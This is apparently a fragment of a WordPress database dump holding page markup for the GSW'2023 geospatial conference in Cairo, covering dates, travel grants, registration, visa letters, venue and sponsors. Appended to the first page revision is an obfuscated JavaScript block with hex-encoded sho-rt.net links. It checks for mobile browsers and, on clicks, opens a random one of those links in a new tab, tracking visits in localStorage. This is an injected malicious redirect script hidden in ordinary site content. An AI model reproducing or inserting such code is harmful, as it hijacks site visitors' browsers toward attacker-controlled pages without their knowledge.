border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320591177{margin-top: -15px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317489572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your name (as it appears in your passport), passport number and nationality.</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 14:24:09','2023-06-09 14:24:09','',3066,'https://gsw2023.com/?p=4648',0,'revision','',0),
(4649,1,'2023-06-09 14:25:01','2023-06-09 14:25:01','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" 